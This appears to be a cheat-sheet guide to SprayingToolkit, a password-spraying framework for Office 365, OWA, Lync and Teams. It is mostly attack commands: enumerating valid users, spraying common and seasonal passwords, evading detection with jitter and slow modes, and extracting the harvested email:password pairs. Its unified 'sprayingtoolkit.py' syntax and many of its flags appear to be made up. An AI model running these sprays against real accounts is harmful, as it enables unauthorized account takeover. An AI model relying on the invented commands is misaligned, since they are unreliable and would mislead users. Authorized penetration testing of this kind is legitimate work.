SprayingToolkit
Overview
SprayingToolkit is a comprehensive Python-based password spraying framework designed specifically for cloud and hybrid environments. It supports multiple protocols and targets including Lync/Skype for Business, Outlook Web Access (OWA), Office 365, Microsoft Teams, and Azure endpoints. The toolkit provides protocol-specific spray capabilities with account lockout protections and integration with threat intelligence sources.
Prerequisites
- Python 3.7+
- Network connectivity to target endpoints
- Valid domain or email addresses
- Wordlist or password file
- Understanding of target authentication mechanisms
- Coordination with Blue Team for detection monitoring
Installation
Linux/macOS
# Clone repository
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Verify installation
python3 sprayingtoolkit.py --helpWindows (PowerShell)
# Clone repository
git clone https://github.com/byt3bl33d3r/SprayingToolkit.git
cd SprayingToolkit
# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1
# Install dependencies
pip install -r requirements.txt
# Run toolkit
python sprayingtoolkit.py --helpDocker Installation
# Build Docker image
docker build -t sprayingtoolkit .
# Run container
docker run -it sprayingtoolkit --help
# Volume mount for results
docker run -v /path/results:/results sprayingtoolkitCore Spray Modules
Office 365 Spraying
# Basic O365 spray
python3 sprayingtoolkit.py -t O365 -u users.txt -p password123
# Use email list
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123
# Spray with multiple passwords
python3 sprayingtoolkit.py -t O365 -e emails.txt -p passwords.txt --wordlist
# Include delay for detection avoidance
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 --delay 5
# Query valid email addresses first
python3 sprayingtoolkit.py -t O365 -e emails.txt --enum-usersOWA (Outlook Web Access) Spraying
# Basic OWA spray against on-premises server
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -u users.txt -p password123
# OWA with NTLM authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -d EXAMPLE.COM -u users.txt -p password123
# Test connectivity first
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com --test-connection
# Extract OWA version
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com --version-checkLync/Skype for Business Spraying
# Basic Lync spray
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 --server lync.example.com
# Auto-discover Lync server
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 --auto-discover
# Spray with SIP addresses
python3 sprayingtoolkit.py -t Lync -e sip_addresses.txt -p password123
# Test Lync connectivity
python3 sprayingtoolkit.py -t Lync --server lync.example.com --test-connectionTeams/Skype Spraying
# Microsoft Teams spray
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123
# Teams with federation
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123 --federation-enabled
# Spray with specific tenant
python3 sprayingtoolkit.py -t Teams -e emails.txt -p password123 --tenant example.comCommon Commands
| Command | Description |
|---|---|
sprayingtoolkit.py -t O365 -e EMAILS -p PASSWORD | Spray Office 365 |
sprayingtoolkit.py -t OWA --url URL -u USERS -p PASS | Spray OWA server |
sprayingtoolkit.py -t Lync -u USERS -p PASS | Spray Lync/SfB |
sprayingtoolkit.py -t Teams -e EMAILS -p PASS | Spray Teams/O365 |
sprayingtoolkit.py -t [TARGET] -p passwords.txt --wordlist | Multi-password spray |
sprayingtoolkit.py -t [TARGET] --delay 5 | Add delay between attempts |
sprayingtoolkit.py -t [TARGET] --enum-users | Enumerate valid users |
sprayingtoolkit.py -t [TARGET] --output results.txt | Save results |
sprayingtoolkit.py -t [TARGET] --lockout-threshold 5 | Set lockout protection |
sprayingtoolkit.py -t [TARGET] --verbose | Detailed output |
Advanced Spray Strategies
Intelligent Spray with Lockout Protection
# Query lockout policy and spray safely
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--check-lockout-policy \
--delay 60 \
--safety-margin 2
# Set specific lockout threshold
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--lockout-threshold 5 \
--lockout-window 30Multi-Protocol Sequential Spraying
# Spray one protocol, then another
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com -u users.txt -p password123 \
--output owa_results.txt
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--server lync.example.com \
--output lync_results.txt
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output o365_results.txtUser Enumeration Before Spray
# Enumerate valid users from O365
python3 sprayingtoolkit.py -t O365 -e all_emails.txt --enum-users \
--output valid_users.txt
# Enumerate OWA valid accounts
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-users
# Use enumerated list for spray
python3 sprayingtoolkit.py -t O365 -e valid_users.txt -p password123Common Password Dictionary Spray
# Common passwords from curated list
python3 sprayingtoolkit.py -t O365 -e emails.txt \
-p "Password123!,Welcome2024,Spring2024,Company123" \
--wordlist
# Seasonal passwords
python3 sprayingtoolkit.py -t O365 -e emails.txt \
-p passwords_spring.txt \
--wordlist \
--delay 120User Enumeration Techniques
Office 365 User Enumeration
# Enumerate valid Office 365 accounts
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-users
# Use Autodiscover for enumeration
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-autodiscover
# Validate email format
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-validate-only
# Export valid users
python3 sprayingtoolkit.py -t O365 -e email_list.txt --enum-users \
--output valid_o365_users.txtOWA User Enumeration
# Enumerate OWA valid users
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-users
# Identify user information
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-detailed
# Extract user attributes
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt --enum-attributesLync/Skype User Enumeration
# Enumerate Lync users
python3 sprayingtoolkit.py -t Lync --server lync.example.com \
-u users.txt --enum-users
# Enumerate SIP addresses
python3 sprayingtoolkit.py -t Lync --server lync.example.com \
--enum-sip-addresses
# Identify Lync enabled users
python3 sprayingtoolkit.py -t Lync --auto-discover --enum-usersConfiguration
Configuration File
# Create spray configuration
cat > spray_config.yaml << 'EOF'
# Target configuration
target: O365
protocol: Office365
# User/Email configuration
users_file: users.txt
emails_file: emails.txt
# Spray parameters
password: password123
wordlist: false
passwords_file: null
# Safety parameters
delay_between_attempts: 5
delay_per_password: 120
lockout_threshold: 5
lockout_observation_window: 30
safety_check_enabled: true
# Enumeration
enum_users: false
enum_mode: autodiscover
# Output
output_file: spray_results.txt
output_format: text
verbose: true
# Protocol specific
ssl_verify: true
timeout: 5
proxy: null
EOF
# Use configuration
python3 sprayingtoolkit.py --config spray_config.yamlEnvironment Variables
# Set target parameters
export SPRAY_TARGET=O365
export SPRAY_EMAILS_FILE=emails.txt
export SPRAY_PASSWORD=password123
export SPRAY_DELAY=5
export SPRAY_LOCKOUT_THRESHOLD=5
# Run with environment
python3 sprayingtoolkit.pyOutput and Analysis
Result Formats
# Text output
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.txt \
--format text
# JSON output for processing
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.json \
--format json
# CSV output
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output results.csv \
--format csvParsing Results
# Extract successful credentials from text
grep "SUCCESS\|VALID\|FOUND" spray_results.txt
# Extract successful accounts
grep -o ".*SUCCESS" spray_results.txt | cut -d' ' -f1 > valid_accounts.txt
# Count successes by protocol
echo "=== Results Summary ==="
echo "O365: $(grep -c "O365.*SUCCESS" spray_results.txt)"
echo "OWA: $(grep -c "OWA.*SUCCESS" spray_results.txt)"
echo "Lync: $(grep -c "Lync.*SUCCESS" spray_results.txt)"JSON Analysis
# Extract successful credentials
cat results.json | jq '.successful_attempts[]'
# Get email/password combinations
cat results.json | jq -r '.successful_attempts[] | "\(.email):\(.password)"'
# Filter by target type
cat results.json | jq '.[] | select(.target == "O365")'
# Statistics
cat results.json | jq '{
total: (.successful_attempts | length),
by_target: (group_by(.target) | map({(.[0].target): length}))
}'Protocol-Specific Techniques
Office 365 Specific
# Use Office 365 REST API enumeration
python3 sprayingtoolkit.py -t O365 -e emails.txt \
--api-enum \
--api-key your_key
# Spray with specific tenant
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--tenant example.onmicrosoft.com
# Check MFA status (enumeration)
python3 sprayingtoolkit.py -t O365 -e emails.txt --enum-mfa-statusOWA Specific
# OWA Forms-Based Authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--auth-method forms
# OWA NTLM Authentication
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-d DOMAIN -u users.txt -p password123 \
--auth-method ntlm
# OWA with custom headers
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--header "X-Custom: value"Lync Specific
# Lync with auto-discovery
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--auto-discover \
--internal-only
# Lync with SIP
python3 sprayingtoolkit.py -t Lync \
--sip-addresses sips.txt -p password123
# Lync with specific pool
python3 sprayingtoolkit.py -t Lync -u users.txt -p password123 \
--pool lync-pool.example.comIntegration with Other Tools
Combine with User Enumeration Tools
# Use email enumeration tool output
./email_hunter.sh example.com > emails.txt
# Spray with found emails
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123Integrate with MailSniper
# Export valid credentials
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output valid_creds.txt
# Use with MailSniper for email enumeration
Invoke-MailSniper -EmailList valid_creds.txt -OutFile mail_results.txtIntegration with Azure/Office 365 Tools
# Connect with found credentials to Azure
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--output azure_creds.txt
# Use credentials with AzureAD module
# Import-Module AzureAD
# $cred = Get-Credential (use found credentials)Safety and Stealth
Account Lockout Protection
# Query AD lockout policy
python3 sprayingtoolkit.py -t O365 -e emails.txt \
--check-lockout-policy
# Conservative spray with safety margin
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--lockout-threshold 5 \
--safety-margin 3 \
--delay 120
# Test without actual attempts
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 --dry-runStealth Techniques
# Randomize user order
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--randomize-order
# Variable delays
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--delay 60 \
--jitter 20
# Slow spray mode
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--slow-mode \
--threads 1Troubleshooting
Common Issues
# Connection timeout
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--timeout 10 \
--retry 3
# SSL certificate errors
python3 sprayingtoolkit.py -t OWA --url https://owa.example.com \
-u users.txt -p password123 \
--ssl-verify false
# Proxy issues
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--proxy http://proxy.example.com:8080Debugging
# Enable debug logging
python3 sprayingtoolkit.py -t O365 -e emails.txt -p password123 \
--debug \
--log-file debug.log
# Test single target
python3 sprayingtoolkit.py -t O365 -e test@example.com -p password123 \
--verbose
# Check tool version
python3 sprayingtoolkit.py --versionBest Practices
- Written Authorization: Obtain approval before spraying any credentials
- Lockout Awareness: Query and respect lockout policies
- Coordination: Notify Blue Team of spray timing and scope
- Delays: Implement appropriate delays between attempts
- Testing: Test enumeration before spray campaigns
- Documentation: Record all attempts and results
- Protocol Knowledge: Understand target authentication before spraying
- Cleanup: Document and remediate any lock-outs
- Safe Hours: Schedule sprays during pre-coordinated windows
- Alternative Methods: Consider authorized password reset testing
Practical Assessment Workflows
Comprehensive Cloud Assessment
# Phase 1: Enumerate valid users
python3 sprayingtoolkit.py -t O365 -e all_emails.txt --enum-users \
--output phase1_valid_users.txt
# Phase 2: Check MFA status
python3 sprayingtoolkit.py -t O365 -e phase1_valid_users.txt --enum-mfa-status \
--output phase2_mfa_status.txt
# Phase 3: Spray with common passwords
python3 sprayingtoolkit.py -t O365 -e phase1_valid_users.txt \
-p common_passwords.txt --wordlist \
--output phase3_spray_results.txt
# Phase 4: Multi-protocol spray
python3 sprayingtoolkit.py -t Lync -u phase1_valid_users.txt -p common_passwords.txt \
--output phase4_lync_results.txtResources
- GitHub: https://github.com/byt3bl33d3r/SprayingToolkit
- Office 365 Security: https://learn.microsoft.com/en-us/office365/
- OWA Documentation: https://learn.microsoft.com/en-us/exchange/clients/outlook-on-the-web/outlook-on-the-web
- Lync/Teams: https://learn.microsoft.com/en-us/microsoftteams/
Summary
SprayingToolkit provides comprehensive multi-protocol password spraying capabilities for cloud and hybrid environments. Proper authorization, safety mechanisms, and coordinated testing are essential for effective and responsible use during authorized security assessments.